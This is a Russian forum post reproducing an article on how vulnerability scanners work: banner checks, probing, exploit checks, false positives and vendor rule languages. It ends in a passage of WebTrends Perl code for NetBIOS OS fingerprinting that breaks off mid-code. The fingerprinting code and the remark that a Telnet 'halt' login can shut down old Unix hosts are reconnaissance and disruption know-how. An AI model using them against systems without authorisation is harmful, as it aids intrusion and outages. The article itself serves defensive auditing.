https://viktoro2007.apbb.ru/viewtopic.php?pid=24#p24 <p>Введение<br />В последнее время увеличилось число публикаций (в основном, зарубежных), посвященных такому новому направлению в области защиты информации, как адаптивная безопасность сети. Это направление состоит из двух основных технологий - анализ защищенности (security assessment) и обнаружение атак (intrusion detection). Именно первой технологии и посвящена данная статья. </p> <p>Сеть состоит из каналов связи, узлов, серверов, рабочих станций, прикладного и системного программного обеспечения, баз данных и т.д. Все эти компоненты нуждаются в оценке эффективности их защиты. Средства анализа защищенности исследуют сеть и ищут &quot;слабые&quot; места в ней, анализируют полученные результаты и на их основе создают различного рода отчеты. В некоторых системах вместо &quot;ручного&quot; вмешательства со стороны администратора найденная уязвимость будет устраняться автоматически (например, в системе System Scanner). Перечислим некоторые из проблем, идентифицируемых системами анализа защищенности: </p> <p>&quot;люки&quot; в программах (back door) и программы типа &quot;троянский конь&quot;; <br />слабые пароли; <br />восприимчивость к проникновению из незащищенных систем; <br />неправильная настройка межсетевых экранов, Web-серверов и баз данных; <br />и т.д. <br />Технология анализа защищенности является действенным методом реализации политики сетевой безопасности прежде, чем осуществится попытка ее нарушения снаружи или изнутри организации. </p> <p>Очень часто пишут об уникальных возможностях систем анализа защищенности (сканерах), подводя читателей к убеждению, что эти системы являются панацеей от всех бед, и что они позволяют обнаруживать все вновь обнаруживаемые уязвимости. Но когда пользователи сталкиваются с ситуацией, которую можно описать заданным мне недавно вопросом: &quot;Я вчера прочитал в Bugtraq про новую уязвимость в моей операционной системе. Почему сетевой сканер безопасности ее не обнаруживает?&quot;, то они начинают обвинять системы анализа защищенности во всех своих бедах. А ответ на заданный вопрос очень прост. В базе данных уязвимостей системы анализа защищенности этой уязвимости пока нет. Это один из аспектов, присущий всем системам анализа защищенности. Они предназначены для обнаружения только известных уязвимостей, описание которых есть у них в базе данных. В этом они подобны антивирусным системам, которым для эффективной работы необходимо постоянно обновлять базу данных сигнатур. Все эти вопросы привели к тому, что я решил поделиться практическим опытом работы с различными системами анализа защищенности и написать о том, как вообще работают сканеры безопасности, что они могут, а что нет. Помимо своего практического опыта, при написании данной статьи я использовал материалы компании Internet Security Systems, Inc., Cisco Systems и Network Associates. </p> <p>Функционировать такие средства могут на сетевом уровне (network-based), уровне операционной системы (host-based) и уровне приложения (application-based). Наибольшее распространение получили средства анализа защищенности сетевых сервисов и протоколов. Связано это, в первую очередь, с универсальностью используемых протоколов. Изученность и повсеместное использование таких протоколов, как IP, TCP, HTTP, FTP, SMTP и т.п. позволяют с высокой степенью эффективности проверять защищенность информационной системы, работающей в данном сетевом окружении. Вторыми по распространенности являются средства анализа защищенности операционных систем (ОС). Связано это также с универсальностью и распространенностью некоторых операционных систем (например, UNIX и Windows NT). Однако из-за того, что каждый производитель вносит в операционную систему свои изменения (ярким примером является множество разновидностей ОС UNIX), средства анализа защищенности ОС анализируют в первую очередь параметры, характерные для всего семейства одной ОС. И лишь для некоторых систем анализируются специфичные для нее параметры. Средств анализа защищенности приложений на сегодняшний день не так много, как этого хотелось бы. Такие средства пока существуют только для широко распространенных прикладных систем, типа Web-броузеры (Netscape Navigator, Microsoft Internet Explorer), СУБД (Microsoft SQL Server, Sybase Adaptive Server) и т.п. </p> <p>Помимо обнаружения уязвимостей, при помощи средств анализа защищенности можно быстро определить все узлы корпоративной сети, доступные в момент проведения тестирования, выявить все используемые в ней сервисы и протоколы, их настройки и возможности для несанкционированного воздействия (как изнутри корпоративной сети, так и снаружи). Также эти средства вырабатывают рекомендации и пошаговые меры, позволяющие устранить выявленные недостатки. </p> <p>Поскольку наибольшее распространение получили средства, функционирующие на уровне сети (системы SATAN, Internet Scanner, CyberCop Scanner, NetSonar и т.д.), то основное внимание будет уделено именно им. </p> <p>Механизмы работы<br />Существует два основных механизма, при помощи которых сканер проверяет наличие уязвимости - сканирование (scan) и зондирование (probe). </p> <p>Сканирование - механизм пассивного анализа, с помощью которого сканер пытается определить наличие уязвимости без фактического подтверждения ее наличия - по косвенным признакам. Этот метод является наиболее быстрым и простым для реализации. В терминах компании ISS данный метод получил название &quot;логический вывод&quot; (inference). Согласно компании Cisco этот процесс идентифицирует открытые порты, найденные на каждом сетевом устройстве, и собирает связанные с портами заголовки (banner), найденные при сканировании каждого порта. Каждый полученный заголовок сравнивается с таблицей правил определения сетевых устройств, операционных систем и потенциальных уязвимостей. На основе проведенного сравнения делается вывод о наличии или отсутствии уязвимости. </p> <p>Зондирование - механизм активного анализа, который позволяет убедиться, присутствует или нет на анализируемом узле уязвимость.Зондирование выполняется путем имитации атаки, использующей проверяемую уязвимость. Этот метод более медленный, чем &quot;сканирование&quot;, но почти всегда гораздо более точный, чем он. В терминах компании ISS данный метод получил название &quot;подтверждение&quot; (verification). Согласно компании Cisco этот процесс использует информацию, полученную в процессе сканирования (&quot;логического вывода&quot;), для детального анализа каждого сетевого устройства. Этот процесс также использует известные методы реализации атак для того, чтобы полностью подтвердить предполагаемые уязвимости и обнаружить другие уязвимости, которые не могут быть обнаружены пассивными методами, например подверженность атакам типа &quot;отказ в обслуживании&quot; (&quot;denial of service&quot;). </p> <p>На практике указанные механизмы реализуются следующими несколькими методами. </p> <p>&quot;Проверка заголовков&quot; (banner check)<br />Указанный механизм представляет собой ряд проверок типа &quot;сканирование&quot; и позволяет делать вывод об уязвимости, опираясь на информацию в заголовке ответа на запрос сканера. Типичный пример такой проверки - анализ заголовков программы Sendmail или FTP-сервера, позволяющий узнать их версию и на основе этой информации сделать вывод о наличии в них уязвимости. </p> <p>Наиболее быстрый и простой для реализации метод проверки присутствия на сканируемом узле уязвимости. Однако за этой простотой скрывается немало проблем. </p> <p>Эффективность проверок заголовков достаточно эфемерна. И вот почему. Во-первых, вы можете изменить текст заголовка, предусмотрительно удалив из него номер версии или иную информацию, на основании которой сканер строит свои заключения. И хотя такие случаи исключительно редки, пренебрегать ими не стоит. Особенно в том случае, если у вас работают специалисты в области безопасности, понимающие всю опасность заголовков &quot;по умолчанию&quot;. Во-вторых, зачастую, версия, указываемая в заголовке ответа на запрос, не всегда говорит об уязвимости программного обеспечения. Особенно это касается программного обеспечения, распространяемого вместе с исходными текстами (например, в рамках проекта GNU). Вы можете самостоятельно устранить уязвимость путем модификации исходного текста, при этом забыв изменить номер версии в заголовке. И в-третьих, устранение уязвимости в одной версии еще не означает, что в следующих версиях эта уязвимость отсутствует. </p> <p>Процесс, описанный выше, является первым и очень важным шагом при сканировании сети. Он не приводит к нарушению функционирования сервисов или узлов сети. Однако не стоит забывать, что администратор может изменить текст заголовков, возвращаемых на внешние запросы. </p> <p>&quot;Активные зондирующие проверки&quot; (active probing check)<br />Также относятся к механизму &quot;сканирования&quot;. Однако они основаны не на проверках версий программного обеспечения в заголовках, а на сравнении &quot;цифрового слепка&quot; (fingerprint) фрагмента программного обеспечения со слепком известной уязвимости. Аналогичным образом поступают антивирусные системы, сравнивая фрагменты сканируемого программного обеспечения с сигнатурами вирусов, хранящимися в специализированной базе данных. Разновидностью этого метода являются проверки контрольных сумм или даты сканируемого программного обеспечения, которые реализуются в сканерах, работающих на уровне операционной системы. </p> <p>Специализированная база данных (в терминах компании Cisco - база данных по сетевой безопасности) содержит информацию об уязвимостях и способах их использовании (атаках). Эти данные дополняются сведениями о мерах их устранения, позволяющих снизить риск безопасности в случае их обнаружения. Зачастую эта база данных используется и системой анализа защищенности и системой обнаружения атак. По крайней мере, так поступают компании Cisco и ISS. </p> <p>Этот метод также достаточно быстр, но реализуется труднее, чем &quot;проверка заголовков&quot;. </p> <p>&quot;Имитация атак&quot; (exploit check)<br />Перевода термина &quot;exploit&quot; в российских публикациях я нигде не встречал и эквивалента в русском языке также не нашел. Поэтому воспользуюсь переводом &quot;имитация атак&quot;. Данные проверки относятся к механизму &quot;зондирования&quot; и основаны на эксплуатации различных дефектов в программном обеспечении. </p> <p>Некоторые уязвимости не обнаруживают себя, пока вы не &quot;подтолкнете&quot; их. Для этого против подозрительного сервиса или узла запускаются реальные атаки. Проверки заголовков осуществляют первичный осмотр сети, а метод &quot;exploit check&quot;, отвергая информацию в заголовках, позволяет имитировать реальные атаки, тем самым с большей эффективностью (но меньшей скоростью) обнаруживая уязвимости на сканируемых узлах. Имитация атак является более надежным способом анализа защищенности, чем проверки заголовков, и обычно более надежны, чем активные зондирующие проверки. </p> <p>Однако существуют случаи, когда имитация атак не всегда может быть реализована. Такие случаи можно разделить на две категории: ситуации, в которых тест приводит к &quot;отказу в обслуживании&quot; анализируемого узла или сети, и ситуации, при которых уязвимость в принципе не годна для реализации атаки на сеть. </p> <p>Как мы все знаем, многие проблемы защиты не могут быть выявлены без блокирования или нарушения функционирования сервиса или компьютера в процессе сканирования. В некоторых случаях нежелательно использовать имитацию атак (например, для анализа защищенности важных серверов), т.к. это может привести к большим затратам (материальным и временным) на восстановление работоспособности выведенных из строя элементов корпоративной сети. В этих случаях желательно применить другие проверки, например, активное зондирование или, в крайнем случае, проверки заголовков. </p> <p>Однако, есть некоторые уязвимости (например, проверка подверженности атакам типа &quot;Packet Storm&quot;), которые просто не могут быть протестированы без возможного выведения из строя сервиса или компьютера. В этом случае разработчики поступают следующим образом, - по умолчанию такие проверки выключены и пользователь может сам включить их, если желает. Таким образом, например, реализованы системы CyberCop Scanner и Internet Scanner. В последней системе такого рода проверки выделены в отдельную категорию &quot;Denial of service&quot; (&quot;Отказ в обслуживании&quot;). При включении любой из проверок этой группы система Internet Scanner выдает сообщение &quot;WARNING: These checks may crash or reboot scanned hosts&quot; (&quot;Внимание: эти проверки могут вывести из строя иди перезагрузить сканируемые узлы&quot;). </p> <p>Этапы сканирования<br />Практически любой сканер проводит анализ защищенности в несколько этапов: </p> <p>Сбор информации о сети. На данном этапе идентифицируются все активные устройства в сети и определяются запущенные на них сервисы и демоны. В случае использования систем анализа защищенности на уровне операционной системы данный этап пропускается, поскольку на каждом анализируемом узле установлены соответствующие агенты системного сканера. <br />Обнаружение потенциальных уязвимостей. Сканер использует описанную выше базу данных для сравнения собранных данных с известными уязвимостями при помощи проверки заголовков или активных зондирующих проверок. В некоторых системах все уязвимости ранжируются по степени риска. Например, в системе NetSonar уязвимости делятся на два класса: сетевые и локальные уязвимости. Сетевые уязвимости (например, воздействующие на маршрутизаторы) считаются более серьезными по сравнению с уязвимостями, характерными только для рабочих станций. Аналогичным образом &quot;поступает&quot; и Internet Scanner. Все уязвимости в нем делятся на три степени риска: высокая (High), средняя (Medium) и низкая (Low). <br />Подтверждение выбранных уязвимостей. Сканер использует специальные методы и моделирует (имитирует) определенные атаки для подтверждения факта наличия уязвимостей на выбранных узлах сети. <br />Генерация отчетов. На основе собранной информации система анализа защищенности создает отчеты, описывающие обнаруженные уязвимости. В некоторых системах (например, Internet Scanner и NetSonar) отчеты создаются для различных категорий пользователей, начиная от администраторов сети и заканчивая руководством компании. Если первых в первую очередь интересуют технические детали, то для руководства компании необходимо представить красиво оформленные с применением графиков и диаграмм отчеты с минимумом подробностей. Немаловажным аспектом является наличие рекомендаций по устранению обнаруженных проблем. И здесь по праву лидером является система Internet Scanner, которая для каждой уязвимости содержит пошаговые инструкции для устранения уязвимостей, специфичные для каждой операционной системы. Во многих случаях отчеты также содержат ссылки на FTP- или Web-сервера, содержащие patch'и и hotfix'ы, устраняющие обнаруженные уязвимости. <br />Автоматическое устранение уязвимостей. Этот этап очень редко реализуется в сетевых сканерах, но широко применяется в системных сканерах (например, System Scanner). При этом данная возможность может реализовываться по-разному. Например, в System Scanner создается специальный сценарий (fix script), который администратор может запустить для устранения уязвимости. Одновременно с созданием этого сценария, создается и второй сценарий, отменяющий произведенные изменения. Это необходимо в том случае, если после устранения проблемы, нормальное функционирование узла было нарушено. В других системах возможности &quot;отката&quot; не существует. <br />В любом случае у администратора, осуществляющего поиск уязвимостей, есть несколько вариантов использования системы анализа защищенности: </p> <p>Запуск сканирования только с проверками на потенциальные уязвимости (этапы 1,2 и 4). Это дает предварительное ознакомление с системами в сети. Этот метод является гораздо менее разрушительным по сравнению с другими и также является самым быстрым. <br />Запуск сканирования с проверками на потенциальные и подтвержденные уязвимости. Этот метод может вызвать нарушение работы узлов сети во время реализации проверок типа &quot;exploit check&quot;. <br />Запуск сканирования с вашими пользовательскими правилами для нахождения конкретной проблемы. <br />Все из вышеназванного. <br />Особенности применения<br />Если сканер не находит уязвимостей на тестируемом узле, то это еще не значит, что их нет. Просто сканер не нашел их. И зависит это не только от самого сканера, но и от его окружения. Например, если Вы тестируете сервис Telnet или FTP на удаленной машине, и сканер сообщает Вам, что уязвимостей не обнаружено - это может значить не только, что уязвимостей нет, а еще и то, что на сканируемом компьютере установлен, например, TCP Wrapper. Да мало ли еще чего? Вы можете пытаться получить доступ к компьютеру через межсетевой экран или попытки доступа блокируются соответствующими фильтрами у провайдера и т.д. Для ОС Windows NT характерен другой случай. Сканер пытается дистанционно проанализировать системный реестр (registry). Однако в случае запрета на анализируемом узле удаленного доступа к реестру, сканер никаких уязвимостей не обнаружит. Существуют и более сложные случаи. И вообще различные реализации одного итого же сервиса по-разному реагируют на системы анализа защищенности. Очень часто на практике можно увидеть, что сканер показывает уязвимости, которых на анализируемом узле нет. Это относится к сетевым сканерам, которые проводят дистанционный анализ узлов сети. И удаленно определить, существует ли в действительности уязвимость или нет, практически невозможно. В этом случае можно порекомендовать использовать систему анализа защищенности на уровне операционной системы, агенты которой устанавливаются на каждый контролируемый узел и проводят все проверки локально. </p> <p>Для решения этой проблемы некоторые компании-производители пошли по пути предоставления своим пользователям нескольких систем анализа защищенности, работающих на всех указанных выше уровнях, - сетевом, системном и уровне приложений. Совокупность этих систем позволяет с высокой степенью эффективности обнаружить практически все известные уязвимости. Например, компания Internet Security Systems предлагает семейство SAFEsuite, состоящее из четырех сканеров: Internet Scanner, System Scanner, Security Manager и Database Scanner. В настоящий момент это единственная компания, которая предлагает системы анализа защищенности, функционирующие на всех трех уровнях информационной инфраструктуры. Другие компании предлагают или два (Axent) или, как правило, один (Network Associates, NetSonar и др.) сканер. </p> <p>Компания Cisco, предлагающая только систему анализа защищенности на уровне сети пошла другим путем для устранения проблемы ложного срабатывания. Она делит все уязвимости на два класса: </p> <p>Потенциальные - вытекающие из проверок заголовков и т.н. активных &quot;подталкиваний&quot; (nudge) анализируемого сервиса или узла. Потенциальная уязвимость возможно существует в системе, но активные зондирующие проверки не подтверждают этого. <br />Подтвержденные - выявленные и существующие на анализируемом хосте. <br />Проверки на потенциальную уязвимость проводятся через коллекцию заголовков и использование &quot;несильных подталкиваний&quot;. &quot;Подталкивание&quot; используется для сервисов, не возвращающих заголовки, но реагирующих на простые команды, например, посылка команды HEAD для получения версии HTTP-сервера. Как только эта информация получена, система NetSonar использует специальный механизм (rules engine), который реализует ряд правил, определяющих, существует ли потенциальная уязвимость. </p> <p>Таким образом, администратор знает, какие из обнаруженных уязвимостей действительно присутствуют в системе, а какие требуют подтверждения. </p> <p>Однако в данном случае остаются уязвимости, с трудом обнаруживаемые или совсем не обнаруживаемые через сеть. Например, проверка &quot;слабости&quot; паролей, используемых пользователями и другими учетными записями. В случае использования сетевого сканера вам потребуется затратить очень много времени на удаленную проверку каждой учетной записи. В то же время, аналогичная проверка, осуществляемая на локальном узле, проводится на несколько порядков быстрее. Другим примером может служить проверка файловой системы сканируемого узла. Во многих случаях ее нельзя осуществить дистанционно. </p> <p>Достоинства сканирования на уровне ОС кроются в прямом доступе к низкоуровневым возможностям ОС хоста, конкретным сервисам и деталям конфигурации. Тогда как сканер сетевого уровня имитирует ситуацию, которую мог бы иметь внешний злоумышленник, сканер системного уровня может рассматривать систему со стороны пользователя, уже имеющего доступ к анализируемой системе и имеющего в ней учетную запись. Это является наиболее важным отличием, поскольку сетевой сканер по определению не может предоставить эффективного анализа возможных рисков деятельности пользователя. </p> <p>Многие сканеры используют более чем один метод проверки одной и той же уязвимости или класса уязвимостей. Однако в случае большого числа проверок использование нескольких методов поиска одной уязвимости привносит свои проблемы. Связано это со скоростью проведения сканирования. </p> <p>Например, различие между системами CyberCop Scanner и Internet Scanner в том, что разработчики из NAI никогда не добавят в свой продукт проверку, если не могут с уверенностью сказать, что проверка надежно обнаруживает уязвимость. В то время как разработчики ISS пополняют свою базу даже в том случае, если их проверка обнаруживает уязвимость с некоторой точностью. Затем, уже после выпуска системы, происходит возврат к разработанным проверкам, их улучшение, добавление новых механизмов осуществления проверок той же уязвимости для повышения достоверности, и т.д. Достаточно спорный вопрос, что лучше. С одной стороны лучше, когда вы с уверенностью можете сказать, что на анализируемом узле определенной уязвимости нет. С другой, даже если существует хоть небольшой шанс, что вы можете обнаружить уязвимость, то надо этим шансом воспользоваться. В любом случае наиболее предпочтительным является проверка типа &quot;имитация атак&quot;, которая обеспечивает наибольший процент точного обнаружения уязвимостей. </p> <p>Не все проверки, разработанные в лабораторных условиях, функционируют так, как должны. Даже, несмотря на то, что эти проверки тестируются, прежде чем будут внесены в окончательную версию сканера. На это могут влиять некоторые факторы: </p> <p>Особенности конфигурации пользовательской системы. <br />Способ, которым был скомпилирован анализируемый демон или сервис. <br />Ошибки удаленной системы. <br />И т.д. <br />В таких случаях автоматическая проверка может пропустить уязвимость, которая легко обнаруживается вручную и которая может быть широко распространена во многих системах. Проверка заголовка в совокупности с активным зондированием в таком случае может помочь определить подозрительную ситуацию, сервис или узел. И хотя уязвимость не обнаружена, еще не значит, что ее не существует. Необходимо другими методами, в т.ч. и неавтоматизированными, исследовать каждый подозрительный случай. </p> <p>Разница в реализации<br />Системы различных производителей могут использовать различные методы поиска одной и той же уязвимости, что может привести к ее нахождению в случае использования одного средства и ненахождения - в случае другого. Хорошую ассоциацию приводит ведущий разработчик системы Internet Scanner Девид ЛеБлан. &quot;Если вы спросите меня - дома мой товарищ или нет, я просто позвоню ему. Если его телефон не отвечает, то я позвоню вам и сообщу, что его нет дома. Затем вы идете к нему домой, стучите в дверь и он отвечает. Не называйте меня лжецом только из-за того, что то, что я пытался сделать не сработало. Возможно, я был не прав или необходимо было использовать другие методы, но я пытался сделать то, что считал нужным&quot;. Так и со средствами поиска уязвимостей. </p> <p>Кроме того, если в созданном отчете не сказано о той или иной уязвимости, то иногда стоит обратиться к журналам регистрации (log) системы анализа защищенности. В некоторых случаях, когда сканер не может со 100%-ой уверенностью определить наличие уязвимости, он не записывает эту информацию в отчет, однако сохраняет ее в логах. Например, анализ и разбор поля sysDescr в журнале регистрации системы Internet Scanner существенно помогает во многих спорных случаях. </p> <p>Существуют различия и между тем, как влияет одна и та же проверка на различные версии сервисов в различных операционных системах. Например, использование учетной записи halt для демона Telnet на некоторых компьютерах под управлением Unix или Windows NT не приведет к плачевным последствиям, в то время как на старых версиях Unix это вызовет запуск команды /bin/halt при попытке доступа к удаленной системе с использованием этой учетной записи. </p> <p>Перспективы развития<br />С 1992 года, когда появился первый сканер SATAN, существенно изменились требования к такого рода средствам. Сейчас уже недостаточно, чтобы система анализа защищенности обладала только обширной базой уязвимостей. Поэтому производители стали расширять функциональность своих продуктов за счет добавления следующих возможностей. </p> <p>Автоматическое обновление уязвимостей<br />До недавнего времени пополнение сканера новыми уязвимостями проводилось достаточно редко (1 раз в месяц и реже). При этом под пополнением понималось обновление всей системы анализа защищенности, т.е. получение новой версии программного обеспечения. </p> <p>Сейчас ситуация меняется. В некоторых системах, например, HackerShield существует возможность автоматического обращения через Internet к Web-серверу компании-производителя и загрузка с него новых уязвимостей. При этом соединение с сервером может производиться как по требованию оператора системы, так и по заданному расписанию. </p> <p>Единый формат базы уязвимостей<br />В целях унификации и возможной интеграции систем анализа защищенности в настоящий момент ведутся работы по созданию единого для всех сканеров формата базы уязвимостей. И хотя работа эта только началась и ей далеко до своего завершения, первые шаги уже сделаны. Например, лаборатория COAST в университете Purdue разработала проект такой базы данных. Одна из проблем, с которой пришлось столкнуться исследователям, - это описание уязвимостей и их проверок (атак). </p> <p>Языки описания уязвимостей и проверок<br />Попытки добавить механизмы описания уязвимостей и проверок в системы анализа защищенности велись давно. Они предпринимались практически всеми компаниями-разработчиками. Первая такая попытка была предпринята Витсом Венема и Деном Фармером - разработчиками системы SATAN. Описание новых уязвимостей, точнее их проверок, осуществлялось при помощи языка Perl. Это достаточно нетривиальная задача требовала обширных знаний как языка Perl, так и архитектуры стека протоколов TCP/IP и сканируемой операционной системы. По этому же пути (использование Perl) пошли разработчики системы WebTrends Security Analyzer. В приложении 1 приведен пример проверки, позволяющей определить тип операционной системы сканируемого узла. Язык Perl, наряду с языком C, используется и в системе Internet Scanner. Причем помимо возможностей, встроенных в саму систему Internet Scanner, компания ISS поставляет отдельную систему описания атак APX (Advanced Packets eXchange). </p> <p>Другим языком, используемым при описании осуществляемых проверок, стал Tcl. Модификации этого языка используются в системах APX (бесплатное приложение к системе Internet Scanner), Security Manager и CyberCop Scanner. Компания Network Associates последовала примеру компании ISS и выделила механизм описания уязвимостей в отдельную систему CyberCop CASL (Custom Audit Scripting Language). Также как и APX, система CyberCop CASL может функционировать под управлением ОС Windows NT и Unix (Linux для CASL и Solaris для APX). </p> <p>В системах APX и CASL описываются параметры сетевых пакетов, при помощи которых моделируются различные атаки. К таким параметрам можно отнести флаги в заголовке IP-пакета, номера портов в заголовке TCP-пакета, поля данных в пакетах различных протоколов и т.д. В качестве примера (Приложение 2) можно привести проверку возможности осуществления подмены пакетов (Spoofing). </p> <p>Однако наиболее удобным с точки зрения конечного пользователя (не программиста) является язык VDL (Vulnerability Descriptive Language) и VEL (Vulnerability Exploit Language), разработанный компанией Cisco. Проверки, описываемые этими языками, основаны на простых логических утверждениях, и пользователь может добавлять правила, если он видит, что они необходимы. Примером такого правила может быть: </p> <p># Секция описания сервисов: На анализируемом узле найден netstat <br />port 15 using protocol tcp =&gt; Service:Info-Status:netstat </p> <p>Данная проверка описывает правило, которое определяет наличие сервиса netstat на 15-ом TCP-порту анализируемого узла. Более сложное следующее правило определяет наличие запущенного приложения SuperApp устаревшей версии по заголовку, возвращаемому на запрос, обращенный к портам 1234 или 1235. </p> <p># Пользовательская проверка: Приложение SuperApp 1.0 запущено на сканируемом хосте. <br />(scanfor &quot;SuperApp 1.0&quot; on port 1234) || (scanfor &quot;SuperApp 1.0 Ready&quot; on port 1235) =&gt; VULp:Old-Software:Super-App-Ancient:10003 </p> <p>Данная потенциальная уязвимость (VULp) относится к типу &quot;устаревшее (потенциально уязвимое) программное обеспечение&quot; (Old-Software) и носит название Supper-App-Ancient, задаваемое пользователем. Число 10003 определяет уникальный номер записи в базе данных уязвимостей системы NetSonar (NSDB). </p> <p>Механизм описания своих проверок и уязвимостей является очень полезной возможностью для администраторов, отслеживающих уязвимости, описанные в Bugtraq и иных списках рассылки.Эта возможность позволяет быстро записать новое правило и использовать его в своей сети. Однако можно заметить, что язык, используемый в системе NetSonar и описывающий эти правила, достаточно элементарен и может помочь только в самых простых случаях. В сложных ситуациях, когда проверку нельзя записать одним правилом, необходимо использовать более сложные сценарии, которые достигаются применением языков Perl, Tcl и C. </p> <p>Необходимо заметить, что хотя данная возможность и является полезной, ее эффективность достаточно эфемерна. В своей практической деятельности мне не приходилось встречаться с организациями, которые могли бы себе позволить содержать целый штат или одного сотрудника, занимающихся исследованиями в области новых проверок и уязвимостей (я не беру в расчет силовые ведомства и иные организации, работающие в области защиты информации). Как правило, человек, отвечающий за обеспечение безопасности, не обладает глубокими познаниями в программировании. Кроме того, помимо анализа защищенности на нем &quot;висит&quot; еще много других задач (контроль пользователей, установка прав доступа и т.д.), и он просто не имеет времени для такой творческой работы, как описание новых проверок. </p> <p>Заключение<br />Использовать такого рода средства надо. Но хочу еще раз заметить, что не стоит считать их панацеей от всех бед. Они ни в коем случае не заменяют специалистов в области безопасности. Они всего лишь автоматизируют их работу, помогая быстро проверить сотни узлов, в т.ч. и находящихся на других территориях. Они помогут вам обнаружить практически все известные уязвимости и порекомендовать меры, их устраняющие. Они автоматизируют этот процесс, а с учетом возможности описания своих собственных проверок, помогут эффективно применять их в сети любой организации, учитывая именно вашу специфику. </p> <p>Надо помнить, что сканер - это всего лишь часть эффективной политики безопасности сети, которая складывается не только из применения различных технических мер защиты (средств анализа защищенности, систем обнаружения атак, межсетевых экранов и т.п.), но и из применения различных организационных и законодательных мер. </p> <p>Приложение 1. Пример проверки, осуществляемой системой WebTrends Security Analyzer<br />&lt;TestAuthor&gt; WebTrends Corporation &lt;/TestAuthor&gt;</p> <p>&lt;TestCopyright&gt; Copyright 1998, WebTrends Corporation, All Rights Reserved. &lt;/TestCopyright&gt;</p> <p>&lt;TestVersion&gt; 2.0 &lt;/TestVersion&gt;</p> <p>====================================================================</p> <p>&lt;TestDependency&gt;estabvc&lt;/TestDependency&gt;</p> <p>&lt;TestCategory&gt;inventory&lt;/TestCategory&gt;</p> <p>====================================================================</p> <p>&lt;TestTitle&gt;Query OS Type via Netbios&lt;/TestTitle&gt;</p> <p>&lt;TestVulnerabilityDescription&gt;<br />This test attempts to determine the operating system type and version running on<br />the specified hosts.<br />&lt;/TestVulnerabilityDescription&gt;</p> <p>====================================================================</p> <p>&lt;Test&gt;</p> <p># osdetectnt.pl<br /># attempt to detect OS using a netbios over tcp/ip call</p> <p>require &quot;crowbar.pl&quot;;</p> <p>$theTargetNetbiosName = GetStringParam($crowbar::WTDB_NetbiosName);<br />crowbar::WTDebugOutput(&quot;OSDetect -- the target netbios name is $theTargetNetbiosName&quot;);</p> <p>if($theTargetNetbiosName){<br />&#160; &#160; $a = crowbar::WTGetNTOSInfo($theTargetNetbiosName);<br />&#160; &#160; if($a){<br />&#160; &#160; &#160; &#160; $a =~ /^OSTYPE (.*):VERSION (.*)/;<br />&#160; &#160; &#160; &#160; $type = $1;<br />&#160; &#160; &#160; &#160; $version = $2;<br />&#160; &#160; &#160; &#160; crowbar::WTDebugOutput(&quot;Type is $type, version is $version\n&quot;);<br />&#160; &#160; &#160; &#160; if($version =~ m/OSVersion_Unknown/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSVersion, length(&quot;Unknown&quot;) + 1, &quot;Unknown&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($version =~ m/OSVersion_WindowsNT_3_5_0/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSVersion, length(&quot;Version 3.5&quot;) + 1, &quot;Version 3.5&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($version =~ m/OSVersion_WindowsNT_3_5_1/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSVersion, length(&quot;Version 3.51&quot;) + 1, &quot;Version 3.51&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($version =~ m/OSVersion_WindowsNT_4_0/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSVersion, length(&quot;Version 4.0&quot;) + 1, &quot;Version 4.0&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($version =~ m/OSVersion_WindowsNT_5_0/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSVersion, length(&quot;Version 5.0&quot;) + 1, &quot;Version 5.0&quot;, -1);<br />&#160; &#160; &#160; &#160; }</p> <p>&#160; &#160; &#160; &#160; if($type =~ m/OSType_Unknown/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Unknown&quot;) + 1, &quot;Unknown&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_Unix/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Unix Server&quot;) + 1, &quot;Unix Server&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_WindowsNTServer/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Windows NT Server&quot;) + 1, &quot;Windows NT Server&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_WindowsNTPDC/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Windows NT Primary Domain Controller&quot;) + 1, &quot;Windows NT Primary Domain Controller&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_WindowsNTBDC/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Windows NT Backup Domain Controller&quot;) + 1, &quot;Windows NT Backup Domain Controller&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_WindowsNTWorkstation/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Windows NT Workstation&quot;) + 1, &quot;Windows NT Workstation&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_WindowsNT/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( $crowbar::WTDB_OSType, length(&quot;Windows NT&quot;) + 1, &quot;Windows NT&quot;, -1);<br />&#160; &#160; &#160; &#160; }<br />&#160; &#160; &#160; &#160; elsif($type =~ m/OSType_Windows95/){<br />&#160; &#160; &#160; &#160; &#160; &#160; crowbar::WTAddRecord( 